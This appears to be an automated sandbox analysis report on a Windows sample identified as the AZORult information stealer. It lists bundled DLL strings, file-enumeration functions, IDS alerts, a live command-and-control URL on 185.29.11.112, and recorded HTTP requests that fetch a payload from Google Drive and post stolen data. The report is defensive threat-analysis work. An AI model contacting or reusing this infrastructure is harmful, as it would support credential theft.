Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471958408.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.472715273.000000001F9A0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491560498.000000002034C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477468468.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491586380.0000000020354000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.477869582.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.469680104.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.470488936.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.12.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479960511.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.480478688.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491685778.0000000020374000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491349501.0000000020324000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.473845022.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491334003.0000000020320000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.12.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491277123.000000002030C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471221878.000000001F998000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.471958408.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.12.dr
Source: Binary string: vcruntime140.i386.pdb source: 1COK25f1vT.exe, 0000000C.00000003.490976694.000000001F304000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.489151743.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.493685455.000000001F978000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490948392.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, vcruntime140.dll.12.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491708487.000000002037C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491685778.0000000020374000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.480866812.000000001F998000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491836442.00000000203BC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.475000686.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.12.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nssdbm3.dll.12.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.475000686.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.475402246.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.12.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: 1COK25f1vT.exe, 0000000C.00000003.485203963.000000001F1CC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492268054.000000001F688000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485153671.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, msvcp140.dll.12.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.466563733.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491775740.0000000020398000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491748363.0000000020388000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.469680104.000000001F990000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491143128.00000000202F4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491172974.00000000202F8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491203658.00000000202FC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491225253.0000000020300000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479481362.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.479096628.000000001F990000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.12.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 1COK25f1vT.exe, 0000000C.00000003.482506212.000000001F994000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.482913611.000000001F99C000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.12.dr
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0041006C FindFirstFileW,FindFirstFileW, 12_2_0041006C
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00414808 FindFirstFileW, 12_2_00414808
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00413030 FindFirstFileW,FindNextFileW,FindClose, 12_2_00413030
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_004099C0 FreeLibrary,FindFirstFileW,DeleteFileW,FindNextFileW,SetCurrentDirectoryW,RemoveDirectoryW, 12_2_004099C0
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040A9E4 FindFirstFileW,FindNextFileW, 12_2_0040A9E4
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040D988 FindFirstFileW,FindFirstFileW, 12_2_0040D988
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_004119AC FindFirstFileW,FindNextFileW,FindClose, 12_2_004119AC
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00414A90 FindFirstFileW,FindFirstFileW, 12_2_00414A90
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040FB40 FindFirstFileW, 12_2_0040FB40
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00412D6C FindFirstFileW,FindNextFileW,FindClose, 12_2_00412D6C
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00414DE8 FindFirstFileW,FindNextFileW, 12_2_00414DE8
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0041160C FindFirstFileW,FindNextFileW,FindClose, 12_2_0041160C
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00409EF0 FindFirstFileW,GetFileAttributesW, 12_2_00409EF0
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 12_2_00413F58
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040F7A8 FindFirstFileW,FindNextFileW, 12_2_0040F7A8
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00410064 FindFirstFileW,FindFirstFileW, 12_2_00410064
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00410068 FindFirstFileW,FindFirstFileW, 12_2_00410068
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040A9E3 FindFirstFileW,FindNextFileW, 12_2_0040A9E3
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_004119A8 FindFirstFileW,FindNextFileW,FindClose, 12_2_004119A8
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040DB00 FindFirstFileW, 12_2_0040DB00
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040DB30 FindFirstFileW, 12_2_0040DB30
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00412D40 FindFirstFileW,FindNextFileW,FindClose, 12_2_00412D40
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00412D48 FindFirstFileW,FindNextFileW,FindClose, 12_2_00412D48
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00412D54 FindFirstFileW,FindNextFileW,FindClose, 12_2_00412D54
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 12_2_00413F58
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_00409EE8 FindFirstFileW,GetFileAttributesW, 12_2_00409EE8
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040F798 FindFirstFileW,FindNextFileW, 12_2_0040F798
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_2_0040F7A0 FindFirstFileW,FindNextFileW, 12_2_0040F7A0
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_1_004148A0 __vbaStrCopy,__vbaStrCopy,__vbaStrCopy,__vbaRedim,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,FindFirstFileW,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaGenerateBoundsError,__vbaGenerateBoundsError,__vbaUI1I2,__vbaFreeStr,__vbaFreeStr,__vbaFreeStr,__vbaAryDestruct, 12_1_004148A0
Source: C:\Users\user\Desktop\1COK25f1vT.exe Code function: 12_1_00414DD0 __vbaChkstk,__vbaOnError,FindFirstFileW, 12_1_00414DD0

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2029465 ET TROJAN Win32/AZORult V3.2 Client Checkin M15 192.168.2.3:49789 -> 185.29.11.112:80
Source: Traffic Snort IDS: 2029141 ET TROJAN AZORult v3.2 Server Response M3 185.29.11.112:80 -> 192.168.2.3:49789
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://185.29.11.112/rothchildnew/Panel/index.php
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DATACLUB-NL DATACLUB-NL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/7bnkiq90sqb2f9a5rfbavvv8a7avoa21/1639944750000/11699732749327025486/*/17RU0VECH2DoNYHaGWGuE-Ywt9AUTzsM-?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0o-b4-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /rothchildnew/Panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 185.29.11.112Content-Length: 107Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 4f ed 3e 33 ed 3e 3c ed 3e 3d ed 3e 3a ed 3e 3b 8a 28 38 8c 28 39 f1 28 39 fb 28 39 fa 28 39 ff 4f 2f fb 3c 2f fb 38 2f fb 34 4b Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8KO>3><>=>:>;(8(9(9(9(9O/</8/4K
Source: global traffic HTTP traffic detected: POST /rothchildnew/Panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: 185.29.11.112Content-Length: 73426Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
Source: unknown TCP traffic detected without corresponding DNS query: 185.29.11.112
